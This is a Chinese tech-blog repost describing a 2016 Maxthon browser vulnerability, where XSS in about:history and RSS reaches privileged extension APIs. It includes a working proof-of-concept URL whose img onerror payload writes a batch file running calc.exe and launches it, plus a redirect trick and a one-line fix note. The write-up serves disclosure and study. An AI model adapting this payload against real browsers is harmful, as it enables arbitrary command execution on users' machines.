[首页]
[文章]
[教程]
首页
Web开发
Windows开发
编程语言
数据库技术
移动平台
系统服务
微信
设计
布布扣
其他
数据分析
首页
>
系统服务
> 详细
傲游浏览器命令执行漏洞介绍以及修复方案
时间:
2016-02-06 17:47:32
阅读:
174
评论:
0
收藏:
0
[点我收藏+]
这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,
1.about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。
2.遨游的拓展中存在大量敏感函数,其中包括了写文件(目前看只能写在C:\Documents and Settings\Administrator\Local Settings\Temp目录下),命令执行(执行你写入的文件),此外目测还有大量系统内部数据可以操作,比如下载,配置等等。
3.除了1所说的地方外,Rss订阅那里也有xss漏洞,我个人估计遨游自己的插件大部分地方可能都会存在xss漏洞
4.2中所提到的大量敏感函数都是在dom中,只能在域i.maxthon.com以及本地类似浏览历史,收藏夹这种地方被调用。
构造类似链接
http://www.jb51.net /1.html#\"><img src=a onerror=‘var b=maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k calc.exe");alert(b.name_);maxthon.program.Program.launch(b.name_,"C:\\WINDOWS\\system32")‘/>
在遨游中访问,
然后打开about:history,就可以看到效果了
那个pdf给的例子是构造了1.html的内容为
a=window.location.href=‘about:history‘;
修复方案:
ms遨游已经修复了直接打开about:history这个洞
傲游浏览器命令执行漏洞介绍以及修复方案
原文:http://www.jb51.net/hack/57375.html
踩
(
0
)
赞
(
0
)
举报
评论
一句话评论(
0
)
登录后才能评论!
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
2021/09/28 scripts
2022-05-27
vue自定义全局指令v-emoji限制input输入表情和特殊字符
2022-05-27
9.26学习总结
2022-05-27
vim操作
2022-05-27
深入理解计算机基础 第三章
2022-05-27
C++ string 作为形参与引用传递(转)
2022-05-27
python 加解密
2022-05-27
JavaScript-对象数组里根据id获取name,对象可能有children属性
2022-05-27
SQL语句——保持现有内容在后面增加内容
2022-05-27
virsh命令文档
2022-05-27
教程昨日排行
更多>
1.
list.reverse()
2.
Django Admin 管理工具
3.
AppML 案例模型
4.
HTML 标签列表(功能排序)
5.
HTML 颜色名
6.
HTML 语言代码
7.
jQuery 事件
8.
jEasyUI 创建分割按钮
9.
jEasyUI 创建复杂布局
10.
jEasyUI 创建简单窗口
友情链接
汇智网
PHP教程
插件网
关于我们
-
联系我们
-
留言反馈
- 联系我们:wmxa8@hotmail.com
© 2014
bubuko.com
版权所有
打开技术之扣,分享程序人生!